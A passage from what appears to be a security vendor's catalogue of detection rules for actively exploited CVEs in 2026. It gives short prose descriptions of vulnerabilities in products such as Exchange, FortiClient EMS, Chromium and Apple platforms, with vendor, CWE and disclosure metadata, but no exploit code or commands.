vendor: Microsoft product: Visual Basic for Applications (VBA) cwe: CWE-426 disclosed: Apr 13, 2026unscoredwrite-up soon - CVE-2020-9715 KEV
Adobe Acrobat Use-After-Free Exploitation (CVE-2020-9715)
Detects exploitation of CVE-2020-9715, a use-after-free vulnerability in Adobe Acrobat that allows arbitrary code execution. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog and has been actively exploited in the wild. Attackers typically deliver malicious PDF documents that trigger memory corruption upon rendering, leading to code execution in the context of the Acrobat process.
vendor: Adobe product: Acrobat cwe: CWE-416 disclosed: Apr 13, 2026unscoredwrite-up soon - CVE-2023-21529 KEV
Microsoft Exchange Server Deserialization of Untrusted Data (CVE-2023-21529)
Detects exploitation attempts targeting CVE-2023-21529, a deserialization of untrusted data vulnerability in Microsoft Exchange Server. Successful exploitation may allow remote code execution by sending crafted requests that trigger unsafe deserialization of attacker-controlled objects.
vendor: Microsoft product: Exchange Server cwe: CWE-502 disclosed: Apr 13, 2026unscoredwrite-up soon - CVE-2023-36424 KEV
CVE-2023-36424 - Microsoft Windows Out-of-Bounds Read Exploitation
Detects exploitation attempts of CVE-2023-36424, a Microsoft Windows out-of-bounds read vulnerability (CWE-125) listed in CISA's Known Exploited Vulnerabilities catalog. Out-of-bounds read vulnerabilities in Windows kernel or system components can be leveraged for privilege escalation, information disclosure, or as a stepping stone in exploit chains. This detection monitors for anomalous process behavior, crash artifacts, and privilege escalation patterns consistent with exploitation of this class of vulnerability.
vendor: Microsoft product: Windows cwe: CWE-125 disclosed: Apr 13, 2026unscoredwrite-up soon - CVE-2025-60710 KEV
Microsoft Windows Link Following Vulnerability (CVE-2025-60710)
CVE-2025-60710 is an actively exploited Microsoft Windows link following vulnerability (CWE-59) that allows an attacker to abuse symbolic links or junction points to redirect file operations to unintended locations. This class of vulnerability is commonly leveraged for privilege escalation, file tampering, or unauthorized access to protected resources. The vulnerability is listed on CISA's Known Exploited Vulnerabilities catalog, indicating confirmed in-the-wild exploitation.
vendor: Microsoft product: Windows cwe: CWE-59 disclosed: Apr 13, 2026unscoredwrite-up soon - CVE-2026-21643 KEV
Fortinet FortiClient EMS SQL Injection Exploitation (CVE-2026-21643)
Detects exploitation attempts targeting a SQL injection vulnerability in Fortinet FortiClient EMS (CVE-2026-21643). This KEV-listed vulnerability allows unauthenticated or authenticated attackers to inject malicious SQL statements into FortiClient EMS, potentially enabling data exfiltration, authentication bypass, or remote code execution via database-level commands such as xp_cmdshell.
vendor: Fortinet product: FortiClient EMS cwe: CWE-89 disclosed: Apr 13, 2026unscoredwrite-up soon - CVE-2026-34621 KEV
Adobe Acrobat and Reader Prototype Pollution Vulnerability (CVE-2026-34621)
Detects exploitation of CVE-2026-34621, a prototype pollution vulnerability (CWE-1321) in Adobe Acrobat and Reader. This KEV-listed vulnerability allows attackers to manipulate JavaScript object prototypes within PDF processing, potentially leading to arbitrary code execution, privilege escalation, or sandbox escape. Exploitation typically occurs via malicious PDF documents that trigger prototype chain manipulation during rendering or form processing.
vendor: Adobe product: Acrobat and Reader cwe: CWE-1321 disclosed: Apr 13, 2026unscoredwrite-up soon - CVE-2026-1340 KEV
Ivanti EPMM Code Injection Exploitation (CVE-2026-1340)
Detects exploitation attempts targeting CVE-2026-1340, a code injection vulnerability (CWE-94) in Ivanti Endpoint Manager Mobile (EPMM). This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog and allows remote attackers to inject and execute arbitrary code via the EPMM management interface. Successful exploitation may lead to full device management compromise, lateral movement, and data exfiltration from enrolled mobile devices.
vendor: Ivanti product: Endpoint Manager Mobile (EPMM) cwe: CWE-94 disclosed: Apr 8, 2026unscoredwrite-up soon - CVE-2026-35616 KEV
CVE-2026-35616 — Fortinet FortiClient EMS Improper Access Control Exploitation
Detects exploitation attempts targeting CVE-2026-35616, an improper access control vulnerability (CWE-284) in Fortinet FortiClient Enterprise Management Server (EMS). This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Attackers may leverage this flaw to bypass access controls on the EMS server, potentially enabling unauthorized configuration changes, endpoint agent manipulation, or lateral movement through managed endpoints.
vendor: Fortinet product: FortiClient EMS cwe: CWE-284 disclosed: Apr 6, 2026unscoredwrite-up soon - CVE-2026-3502 KEV
TrueConf Client Download of Code Without Integrity Check (CVE-2026-3502)
Detects exploitation of CVE-2026-3502, a CWE-494 (Download of Code Without Integrity Check) vulnerability in TrueConf Client. An attacker with a network position to intercept or manipulate TrueConf Client update/download channels can deliver unsigned or tampered code to client systems, enabling arbitrary code execution. This CVE is listed on the CISA KEV catalog, indicating active exploitation in the wild.
vendor: TrueConf product: Client cwe: CWE-494 disclosed: Apr 2, 2026unscoredwrite-up soon - CVE-2026-5281 KEV
CVE-2026-5281 — Google Dawn Use-After-Free Exploitation
Detects exploitation of CVE-2026-5281, a use-after-free vulnerability in Google Dawn (the WebGPU implementation used by Chrome). Exploitation may result in renderer compromise, sandbox escape, or arbitrary code execution via a malicious web page. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: Google product: Dawn cwe: CWE-416 disclosed: Apr 1, 2026unscoredwrite-up soon - CVE-2026-3055 KEV
Citrix NetScaler Out-of-Bounds Read (CVE-2026-3055)
Detects exploitation attempts targeting CVE-2026-3055, an out-of-bounds read vulnerability (CWE-125) in Citrix NetScaler ADC and NetScaler Gateway. This vulnerability is actively exploited in the wild (CISA KEV) and may allow unauthenticated remote attackers to read sensitive memory contents, potentially leading to information disclosure or enabling further attacks. Detection focuses on anomalous HTTP request patterns, NetScaler management plane access, and memory-related crash indicators.
vendor: Citrix product: NetScaler cwe: CWE-125 disclosed: Mar 30, 2026unscoredwrite-up soon - CVE-2025-53521 KEV
F5 BIG-IP Stack-Based Buffer Overflow Exploitation (CVE-2025-53521)
Detects exploitation attempts and post-exploitation activity related to CVE-2025-53521, a stack-based buffer overflow vulnerability (CWE-121) in F5 BIG-IP. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog and may allow remote attackers to execute arbitrary code or cause denial of service by sending crafted requests that overflow stack buffers in BIG-IP processing components.
vendor: F5 product: BIG-IP cwe: CWE-121 disclosed: Mar 27, 2026unscoredwrite-up soon - CVE-2026-33634 KEV
Aquasecurity Trivy Embedded Malicious Code (CVE-2026-33634)
CVE-2026-33634 describes an embedded malicious code vulnerability (CWE-506) in Aquasecurity Trivy, a widely-used open-source vulnerability scanner. A compromised or trojanized Trivy binary may execute attacker-controlled code during container image scanning, CI/CD pipeline runs, or Kubernetes admission checks. Because Trivy is frequently granted elevated permissions to access container registries, Kubernetes API servers, and cloud credential chains, a backdoored instance poses critical supply-chain risk: exfiltration of secrets, lateral movement into CI/CD infrastructure, and persistent implant installation. This detection monitors for anomalous process behavior, unexpected network egress, and suspicious file activity originating from Trivy processes.
vendor: Aquasecurity product: Trivy cwe: CWE-506 disclosed: Mar 26, 2026unscoredwrite-up soon - CVE-2026-33017 KEV
CVE-2026-33017: Langflow Code Injection Vulnerability
Detects exploitation of CVE-2026-33017, a code injection vulnerability in Langflow that allows unauthenticated or low-privileged attackers to execute arbitrary code via the Langflow API. The vulnerability stems from improper input validation (CWE-94/CWE-95) combined with missing authentication controls (CWE-306), enabling remote code execution against Langflow instances. This CVE is on the CISA KEV list, indicating active exploitation in the wild.
vendor: Langflow product: Langflow cwe: CWE-94, CWE-95 disclosed: Mar 25, 2026unscoredwrite-up soon - CVE-2025-31277 KEV
Apple Multiple Products Buffer Overflow Exploitation (CVE-2025-31277)
Detects potential exploitation of CVE-2025-31277, a buffer overflow vulnerability (CWE-119) affecting multiple Apple products. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Successful exploitation may allow attackers to execute arbitrary code, escalate privileges, or cause denial of service on affected Apple devices and systems.
vendor: Apple product: Multiple Products cwe: CWE-119 disclosed: Mar 20, 2026unscoredwrite-up soon - CVE-2025-32432 KEV
CVE-2025-32432: Craft CMS Remote Code Injection
Detects exploitation of CVE-2025-32432, a critical code injection vulnerability (CWE-94) in Craft CMS that allows remote attackers to execute arbitrary code. This vulnerability is actively exploited in the wild (CISA KEV) and targets Craft CMS installations via malicious template or input injection vectors.
vendor: Craft CMS product: Craft CMS cwe: CWE-94 disclosed: Mar 20, 2026unscoredwrite-up soon - CVE-2025-43510 KEV
Apple Multiple Products Improper Locking Vulnerability (CVE-2025-43510)
CVE-2025-43510 is an improper locking vulnerability (CWE-667) affecting multiple Apple products, including macOS, iOS, iPadOS, tvOS, visionOS, and watchOS. This flaw, added to CISA's Known Exploited Vulnerabilities catalog, allows an attacker with local access to potentially exploit race conditions arising from improper mutex or lock management, leading to privilege escalation, memory corruption, or kernel-level code execution. Detection focuses on anomalous kernel panics, unexpected privilege escalations, exploitation of race conditions, and post-exploitation indicators on Apple endpoints.
vendor: Apple product: Multiple Products cwe: CWE-667 disclosed: Mar 20, 2026unscoredwrite-up soon - CVE-2025-43520 KEV
Apple Multiple Products Classic Buffer Overflow Exploitation (CVE-2025-43520)
Detects exploitation attempts targeting CVE-2025-43520, a classic buffer overflow vulnerability (CWE-120) affecting Apple Multiple Products. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Buffer overflow exploitation may manifest as abnormal process crashes, memory corruption signals, unexpected child process spawning from Apple system processes, or anomalous network connections following process exploitation.
vendor: Apple product: Multiple Products cwe: CWE-120 disclosed: Mar 20, 2026unscoredwrite-up soon - CVE-2025-54068 KEV
Laravel Livewire Code Injection (CVE-2025-54068)
Detects exploitation of CVE-2025-54068, a code injection vulnerability in Laravel Livewire. This KEV-listed vulnerability allows attackers to inject and execute arbitrary PHP code through Livewire component handling, potentially leading to remote code execution on affected Laravel applications.
vendor: Laravel product: Livewire cwe: CWE-94 disclosed: Mar 20, 2026unscoredwrite-up soon - CVE-2026-20131 KEV
Cisco FMC/SCC Deserialization RCE Exploitation (CVE-2026-20131)
Detects exploitation of CVE-2026-20131, a deserialization of untrusted data vulnerability in Cisco Secure Firewall Management Center (FMC) and Cisco Security Cloud Control (SCC) Firewall Management. Successful exploitation allows unauthenticated or authenticated remote attackers to execute arbitrary commands on the underlying OS. This CVE is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: Cisco product: Secure Firewall Management Center (FMC) cwe: CWE-502 disclosed: Mar 19, 2026unscoredwrite-up soon - CVE-2025-66376 KEV
Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Exploitation
Detects exploitation attempts targeting CVE-2025-66376, a cross-site scripting vulnerability in Synacor Zimbra Collaboration Suite (ZCS). This KEV-listed vulnerability allows attackers to inject malicious scripts into the Zimbra web interface, potentially leading to session hijacking, credential theft, or further compromise of email infrastructure. Active exploitation has been confirmed by CISA.
vendor: Synacor product: Zimbra Collaboration Suite (ZCS) cwe: CWE-79 disclosed: Mar 18, 2026unscoredwrite-up soon - CVE-2026-20963 KEV
Microsoft SharePoint Deserialization of Untrusted Data (CVE-2026-20963)
Detects exploitation of CVE-2026-20963, a deserialization of untrusted data vulnerability in Microsoft SharePoint. Attackers can send crafted serialized payloads to SharePoint endpoints, leading to remote code execution in the context of the SharePoint application pool. This CVE is listed on the CISA KEV catalog, indicating active exploitation in the wild.
vendor: Microsoft product: SharePoint cwe: CWE-502 disclosed: Mar 18, 2026unscoredwrite-up soon - CVE-2025-47813 KEV
Wing FTP Server Information Disclosure via Error Messages (CVE-2025-47813)
Detects potential exploitation of CVE-2025-47813, an information disclosure vulnerability in Wing FTP Server (CWE-209) where detailed error messages expose sensitive server-side information. This vulnerability is actively exploited in the wild (CISA KEV). Attackers may probe the FTP server with malformed or unexpected requests to trigger verbose error responses revealing internal paths, software versions, configuration details, or stack traces.
vendor: Wing FTP Server product: Wing FTP Server cwe: CWE-209 disclosed: Mar 16, 2026unscoredwrite-up soon - CVE-2026-3909 KEV
Google Skia Out-of-Bounds Write (CVE-2026-3909)
Detects exploitation attempts targeting CVE-2026-3909, an out-of-bounds write vulnerability in Google Skia graphics library. Skia is embedded in Chrome and other Google products. Exploitation can lead to arbitrary code execution via crafted web content or malicious files. This vulnerability is confirmed exploited in the wild (CISA KEV).
vendor: Google product: Skia cwe: CWE-787 disclosed: Mar 13, 2026unscoredwrite-up soon - CVE-2026-3910 KEV
CVE-2026-3910: Google Chromium V8 Memory Buffer Bounds Violation
Detects exploitation attempts and post-exploitation indicators related to CVE-2026-3910, an improper restriction of operations within the bounds of a memory buffer (CWE-119) in Google Chromium's V8 JavaScript engine. This vulnerability is actively exploited in the wild (CISA KEV) and may allow attackers to achieve remote code execution via a malicious web page, potentially leading to sandbox escape and full system compromise.
vendor: Google product: Chromium V8 cwe: CWE-119 disclosed: Mar 13, 2026unscoredwrite-up soon - CVE-2025-68613 KEV
n8n Improper Control of Dynamically-Managed Code Resources (CVE-2025-68613)
Detects exploitation of CVE-2025-68613, a critical vulnerability in n8n workflow automation platform where improper control of dynamically-managed code resources (CWE-913) allows attackers to execute arbitrary code. This vulnerability is actively exploited in the wild (CISA KEV). Attackers can abuse n8n's Code node or expression evaluation engine to break out of intended sandboxing and execute arbitrary system commands on the underlying host.
vendor: n8n product: n8n cwe: CWE-913 disclosed: Mar 11, 2026unscoredwrite-up soon - CVE-2021-22054 KEV
Omnissa Workspace ONE UEM Server-Side Request Forgery (CVE-2021-22054)
Detects exploitation of CVE-2021-22054, a Server-Side Request Forgery (SSRF) vulnerability in Omnissa (formerly VMware) Workspace ONE UEM. An unauthenticated attacker can send crafted HTTP requests to the UEM server, causing it to make arbitrary outbound HTTP/HTTPS requests to internal or external resources. This can be leveraged to scan internal networks, access cloud metadata services (e.g., AWS IMDS), or pivot to internal services not directly reachable by the attacker. The vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: Omnissa product: Workspace One UEM cwe: CWE-918 disclosed: Mar 9, 2026unscoredwrite-up soon - CVE-2025-26399 KEV
SolarWinds Web Help Desk Deserialization of Untrusted Data (CVE-2025-26399)
CVE-2025-26399 is a deserialization of untrusted data vulnerability (CWE-502) in SolarWinds Web Help Desk. Exploitation allows remote attackers to execute arbitrary code by sending maliciously crafted serialized Java objects to the application. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. SolarWinds Web Help Desk is widely deployed in enterprise and government environments for IT service management, making this a high-priority target for threat actors seeking privileged network access.
vendor: SolarWinds product: Web Help Desk cwe: CWE-502 disclosed: Mar 9, 2026unscoredwrite-up soon - CVE-2026-1603 KEV
Ivanti Endpoint Manager (EPM) Authentication Bypass (CVE-2026-1603)
CVE-2026-1603 is an authentication bypass vulnerability (CWE-288) in Ivanti Endpoint Manager (EPM). This KEV-listed vulnerability allows unauthenticated attackers to bypass authentication mechanisms and gain unauthorized access to the EPM management interface. Successful exploitation may lead to full compromise of managed endpoints, lateral movement, and deployment of malicious software across the enterprise.
vendor: Ivanti product: Endpoint Manager (EPM) cwe: CWE-288 disclosed: Mar 9, 2026unscoredwrite-up soon - CVE-2017-7921 KEV
Hikvision Improper Authentication Exploitation (CVE-2017-7921)
Detects exploitation attempts targeting CVE-2017-7921, an improper authentication vulnerability (CWE-287) in Hikvision IP cameras and multiple products. This vulnerability allows unauthenticated attackers to bypass authentication and gain unauthorized access to camera streams, configurations, and credentials by manipulating URL parameters. Listed on CISA KEV, indicating active exploitation in the wild. Attackers commonly use this to gain persistent access to surveillance infrastructure, pivot within networks, or exfiltrate sensitive footage.
vendor: Hikvision product: Multiple Products cwe: CWE-287 disclosed: Mar 5, 2026unscoredwrite-up soon - CVE-2021-22681 KEV
Rockwell Automation Logix Controllers Insufficient Credential Protection (CVE-2021-22681)
CVE-2021-22681 is an insufficient protection of credentials vulnerability (CWE-522) affecting Rockwell Automation multiple products including Logix controllers. An attacker can intercept or obtain weakly protected credentials used to authenticate with Logix controllers, enabling authentication bypass. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog and poses critical risk in OT/ICS environments where unauthorized controller access could cause process disruption or physical damage.
vendor: Rockwell product: Multiple Products cwe: CWE-522 disclosed: Mar 5, 2026unscoredwrite-up soon - CVE-2021-30952 KEV
CVE-2021-30952: Apple Multiple Products Integer Overflow Exploitation
Detects exploitation attempts of CVE-2021-30952, an integer overflow vulnerability in Apple Multiple Products. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Integer overflow conditions in Apple platform components can lead to memory corruption, arbitrary code execution, or privilege escalation.
vendor: Apple product: Multiple Products cwe: CWE-190 disclosed: Mar 5, 2026unscoredwrite-up soon - CVE-2023-41974 KEV
Apple iOS/iPadOS Use-After-Free Exploitation (CVE-2023-41974)
Detects exploitation attempts and post-exploitation activity related to CVE-2023-41974, a use-after-free vulnerability in Apple iOS and iPadOS. This vulnerability allows an attacker to achieve arbitrary code execution, potentially leading to full device compromise. It is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Detection focuses on mobile device management telemetry, abnormal process behavior on managed Apple devices, and network indicators associated with mobile exploit frameworks.
vendor: Apple product: iOS and iPadOS cwe: CWE-416 disclosed: Mar 5, 2026unscoredwrite-up soon - CVE-2023-43000 KEV
Apple Multiple Products Use-After-Free Vulnerability (CVE-2023-43000)
Detects exploitation of CVE-2023-43000, a use-after-free vulnerability (CWE-416) affecting multiple Apple products. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Use-after-free conditions in Apple system components can allow attackers to execute arbitrary code, escalate privileges, or achieve kernel-level compromise on affected macOS, iOS, and related platforms.
vendor: Apple product: Multiple Products cwe: CWE-416 disclosed: Mar 5, 2026unscoredwrite-up soon - CVE-2026-22719 KEV
CVE-2026-22719: VMware Aria Operations Command Injection
Detects exploitation of CVE-2026-22719, a command injection vulnerability (CWE-77) in Broadcom VMware Aria Operations. This KEV-listed vulnerability allows attackers to inject and execute arbitrary OS commands through unsanitized input, potentially leading to full host compromise, lateral movement, and persistence within virtualized environments.
vendor: Broadcom product: VMware Aria Operations cwe: CWE-77 disclosed: Mar 3, 2026unscoredwrite-up soon - CVE-2022-20775 KEV
CVE-2022-20775 — Cisco SD-WAN Path Traversal Exploitation Attempt
Detects exploitation attempts targeting CVE-2022-20775, a path traversal vulnerability (CWE-25, CWE-282) in Cisco SD-WAN software. Successful exploitation may allow an authenticated attacker to read or write arbitrary files on the underlying operating system, potentially leading to privilege escalation or persistent access. This CVE is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: Cisco product: SD-WAN cwe: CWE-25, CWE-282 disclosed: Feb 25, 2026unscoredwrite-up soon - CVE-2026-20127 KEV
Cisco Catalyst SD-WAN Controller and Manager Authentication Bypass (CVE-2026-20127)
CVE-2026-20127 is an authentication bypass vulnerability (CWE-287) affecting Cisco Catalyst SD-WAN Controller and Manager. A remote, unauthenticated attacker may exploit improper authentication mechanisms to gain unauthorized access to the management plane. This vulnerability is actively exploited in the wild per CISA KEV and is subject to Emergency Directive ED-26-03.
vendor: Cisco product: Catalyst SD-WAN Controller and Manager cwe: CWE-287 disclosed: Feb 25, 2026unscoredwrite-up soon - CVE-2026-25108 KEV
Soliton FileZen OS Command Injection Exploitation (CVE-2026-25108)
Detects exploitation of CVE-2026-25108, an OS command injection vulnerability (CWE-78) in Soliton Systems K.K FileZen file-sharing appliance. This vulnerability is listed on CISA's Known Exploited Vulnerabilities catalog and allows unauthenticated or authenticated attackers to inject arbitrary OS commands through vulnerable input fields, potentially leading to full system compromise.
vendor: Soliton Systems K.K product: FileZen cwe: CWE-78 disclosed: Feb 24, 2026unscoredwrite-up soon - CVE-2025-49113 KEV
RoundCube Webmail Deserialization of Untrusted Data (CVE-2025-49113)
CVE-2025-49113 is an actively exploited deserialization of untrusted data vulnerability (CWE-502) in Roundcube Webmail. When exploited, an attacker can send a specially crafted serialized PHP object via the web interface, leading to remote code execution on the underlying server. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog and requires immediate patching to versions 1.5.10 or 1.6.11.
vendor: Roundcube product: Webmail cwe: CWE-502 disclosed: Feb 20, 2026unscoredwrite-up soon - CVE-2025-68461 KEV
RoundCube Webmail Cross-Site Scripting (XSS) Exploitation Attempt
Detects exploitation attempts targeting CVE-2025-68461, a stored/reflected cross-site scripting vulnerability in RoundCube Webmail. This vulnerability, listed in CISA's Known Exploited Vulnerabilities catalog, allows attackers to inject malicious scripts via email content, potentially leading to session hijacking, credential theft, or further compromise of the mail server environment. Affected versions include RoundCube Webmail prior to 1.5.12 and 1.6.12.
vendor: Roundcube product: Webmail cwe: CWE-79 disclosed: Feb 20, 2026unscoredwrite-up soon - CVE-2021-22175 KEV
GitLab SSRF Exploitation (CVE-2021-22175)
Detects exploitation of CVE-2021-22175, a Server-Side Request Forgery (SSRF) vulnerability in GitLab. An attacker can craft requests that cause the GitLab server to make HTTP requests to internal or external resources, potentially exposing cloud metadata endpoints, internal services, or facilitating lateral movement. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog.
vendor: GitLab product: GitLab cwe: CWE-918 disclosed: Feb 18, 2026unscoredwrite-up soon - CVE-2026-22769 KEV
Dell RecoverPoint for Virtual Machines (RP4VMs) Hard-coded Credentials Exploitation
Detects exploitation of CVE-2026-22769, a hard-coded credentials vulnerability in Dell RecoverPoint for Virtual Machines (RP4VMs). Threat actors (including UNC6201) have actively exploited this zero-day to gain unauthorized access to RP4VMs appliances, enabling lateral movement, data exfiltration, and ransomware deployment within virtualized environments. The hard-coded credentials allow unauthenticated remote access to RP4VMs management interfaces.
vendor: Dell product: RecoverPoint for Virtual Machines (RP4VMs) cwe: CWE-798 disclosed: Feb 18, 2026unscoredwrite-up soon - CVE-2008-0015 KEV
Microsoft Windows Video ActiveX Control Remote Code Execution (CVE-2008-0015)
Detects exploitation attempts targeting the Microsoft Windows Video ActiveX Control vulnerability (CVE-2008-0015), addressed in MS09-032. The msvidctl.dll ActiveX control contains a memory corruption flaw that allows remote attackers to execute arbitrary code via a crafted web page. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog and has been actively exploited in drive-by download campaigns.
vendor: Microsoft product: Windows disclosed: Feb 17, 2026unscoredwrite-up soon - CVE-2020-7796 KEV
Zimbra Collaboration Suite SSRF Exploitation (CVE-2020-7796)
Detects exploitation attempts targeting CVE-2020-7796, a Server-Side Request Forgery (SSRF) vulnerability in Synacor Zimbra Collaboration Suite (ZCS). This vulnerability allows unauthenticated remote attackers to make the Zimbra server issue arbitrary HTTP requests to internal or external resources, potentially enabling internal network scanning, credential theft, or pivoting to internal services.
vendor: Synacor product: Zimbra Collaboration Suite cwe: CWE-918 disclosed: Feb 17, 2026unscoredwrite-up soon - CVE-2024-7694 KEV
TeamT5 ThreatSonar Anti-Ransomware Unrestricted File Upload (CVE-2024-7694)
CVE-2024-7694 is an unrestricted file upload vulnerability (CWE-434) in TeamT5 ThreatSonar Anti-Ransomware. An attacker can upload files with dangerous types to the ThreatSonar management interface, potentially achieving remote code execution on the host running the security product. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Successful exploitation of a security product creates a high-impact scenario where the attacker may gain privileged access to the endpoint security management plane.
vendor: TeamT5 product: ThreatSonar Anti-Ransomware cwe: CWE-434 disclosed: Feb 17, 2026unscoredwrite-up soon - CVE-2026-2441 KEV
CVE-2026-2441: Google Chromium CSS Use-After-Free Exploitation
Detects exploitation of CVE-2026-2441, a use-after-free vulnerability in the CSS engine of Google Chromium. This vulnerability is actively exploited in the wild (CISA KEV) and can allow remote code execution via a malicious web page. Detection focuses on abnormal Chromium renderer process behavior, suspicious child process spawning, and memory corruption indicators consistent with UAF exploitation.
vendor: Google product: Chromium cwe: CWE-416 disclosed: Feb 17, 2026unscoredwrite-up soon - CVE-2024-43468 KEV
CVE-2024-43468: Microsoft Configuration Manager SQL Injection Exploitation
Detects exploitation attempts targeting CVE-2024-43468, a SQL injection vulnerability in Microsoft Configuration Manager (SCCM/ConfigMgr). This vulnerability allows unauthenticated attackers to execute arbitrary SQL commands against the ConfigMgr site database, potentially leading to remote code execution, credential theft, and lateral movement within the environment. Listed in CISA KEV indicating active exploitation in the wild.
vendor: Microsoft product: Configuration Manager cwe: CWE-89 disclosed: Feb 12, 2026unscoredwrite-up soon - CVE-2025-15556 KEV
Notepad++ Download of Code Without Integrity Check (CVE-2025-15556)
CVE-2025-15556 is a CWE-494 (Download of Code Without Integrity Check) vulnerability in Notepad++ that has been added to CISA's Known Exploited Vulnerabilities catalog. The vulnerability allows an attacker to deliver malicious code through Notepad++'s update or plugin mechanism without cryptographic integrity verification, enabling arbitrary code execution in the context of the user running Notepad++. This is actively exploited in the wild and should be treated as high-priority for endpoint detection and response.
vendor: Notepad++ product: Notepad++ cwe: CWE-494 disclosed: Feb 12, 2026unscoredwrite-up soon - CVE-2025-40536 KEV
SolarWinds Web Help Desk Security Control Bypass (CVE-2025-40536)
Detects exploitation of CVE-2025-40536, a security control bypass vulnerability (CWE-693) in SolarWinds Web Help Desk. This vulnerability is actively exploited in the wild (CISA KEV) and allows attackers to bypass authentication or authorization controls within the Web Help Desk application. Successful exploitation may enable unauthorized access to ticketing data, credential stores, or administrative functions.
vendor: SolarWinds product: Web Help Desk cwe: CWE-693 disclosed: Feb 12, 2026unscoredwrite-up soon - CVE-2026-20700 KEV
Apple Multiple Products Buffer Overflow Exploitation (CVE-2026-20700)
Detects exploitation attempts and post-exploitation activity related to CVE-2026-20700, a buffer overflow vulnerability (CWE-119) affecting multiple Apple products. This vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild. Buffer overflow exploitation against Apple platforms may result in arbitrary code execution, privilege escalation, or sandbox escape.
vendor: Apple product: Multiple Products cwe: CWE-119 disclosed: Feb 12, 2026unscoredwrite-up soon - CVE-2026-21510 KEV
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure
Detects exploitation of CVE-2026-21510, a Microsoft Windows Shell protection mechanism failure (CWE-693) that allows attackers to bypass security controls enforced by the Windows Shell. This vulnerability is actively exploited in the wild (CISA KEV). Attackers may abuse this flaw to execute unauthorized code, bypass security prompts, or escalate privileges via crafted shell interactions.
vendor: Microsoft product: Windows cwe: CWE-693 disclosed: Feb 10, 2026unscoredwrite-up soon - CVE-2026-21513 KEV
CVE-2026-21513 — Microsoft MSHTML Framework Protection Mechanism Failure
Detects exploitation of CVE-2026-21513, a protection mechanism failure (CWE-693) in the Microsoft MSHTML framework on Windows. This KEV-listed vulnerability allows attackers to bypass security controls implemented in MSHTML, potentially enabling code execution via crafted web content processed by Internet Explorer compatibility components, Microsoft Office documents embedding web content, or applications using the WebBrowser control. Active exploitation has been confirmed by CISA.
vendor: Microsoft product: Windows cwe: CWE-693 disclosed: Feb 10, 2026unscoredwrite-up soon - CVE-2026-21514 KEV
Microsoft Office Word Reliance on Untrusted Inputs in Security Decision (CVE-2026-21514)
Detects exploitation of CVE-2026-21514, a Microsoft Office Word vulnerability classified as CWE-807 (Reliance on Untrusted Inputs in a Security Decision). This flaw allows attackers to manipulate security-relevant decisions in Word by supplying crafted untrusted input, potentially bypassing security controls such as Protected View, macro policy enforcement, or document trust decisions. This CVE is listed on the CISA KEV catalog, indicating active exploitation in the wild.
vendor: Microsoft product: Office cwe: CWE-807 disclosed: Feb 10, 2026unscoredwrite-up soon - CVE-2026-21519 KEV
Microsoft Windows Type Confusion Vulnerability (CVE-2026-21519)
Detects exploitation of CVE-2026-21519, a type confusion vulnerability (CWE-843) in Microsoft Windows. Type confusion vulnerabilities occur when code allocates or initializes a resource using one type but accesses it using an incompatible type, leading to out-of-bounds memory access, arbitrary code execution, or privilege escalation. This CVE is listed on the CISA Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild.
vendor: Microsoft product: Windows cwe: CWE-843 disclosed: Feb 10, 2026unscoredwrite-up soon - CVE-2026-21525 KEV
CVE-2026-21525 - Microsoft Windows NULL Pointer Dereference Exploitation
Detects exploitation attempts and post-exploitation activity related to CVE-2026-21525, a NULL pointer dereference vulnerability in Microsoft Windows. This vulnerability is actively exploited in the wild (CISA KEV) and may allow attackers to achieve privilege escalation or code execution via memory corruption techniques targeting Windows kernel or user-mode components.
vendor: Microsoft product: Windows cwe: CWE-476 disclosed: Feb 10, 2026unscoredwrite-up soon - CVE-2026-21533 KEV
Microsoft Windows Improper Privilege Management (CVE-2026-21533)
Detects exploitation of CVE-2026-21533, a Microsoft Windows Improper Privilege Management vulnerability (CWE-269) listed in CISA's Known Exploited Vulnerabilities catalog. Successful exploitation allows a local attacker to elevate privileges on a compromised Windows system. Detection focuses on anomalous privilege token manipulation, unexpected service/process privilege escalation, and suspicious access patterns consistent with local privilege escalation techniques.
vendor: Microsoft product: Windows cwe: CWE-269 disclosed: Feb 10, 2026unscoredwrite-up soon - CVE-2026-1731 KEV PoC
BeyondTrust Remote Support Pre-Auth Remote Code Execution
CVE-2026-1731 is a critical (CVSS 9.8) pre-authentication remote code execution vulnerability in BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA). By sending specially crafted requests, an unauthenticated remote attacker can execute operating system commands in the context of the web application site user. BeyondTrust Remote Support is widely deployed in enterprise and SMB environments for helpdesk and IT support operations, creating direct privileged access to end-user machines. This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalogue, with active exploitation observed in the wild (GreyNoise confirmed reconnaissance scanning). A working proof-of-concept exploit is publicly available on GitHub. Successful exploitation provides attackers with a foothold in the support infrastructure, enabling lateral movement to all machines with active or historical BeyondTrust support sessions.
vendor: BeyondTrust product: Remote Support, Privileged Remote Access cwe: CWE-78 disclosed: Feb 6, 20269.8 criticalwrite-up soon - CVE-2025-11953 KEV
React Native Community CLI OS Command Injection (CVE-2025-11953)
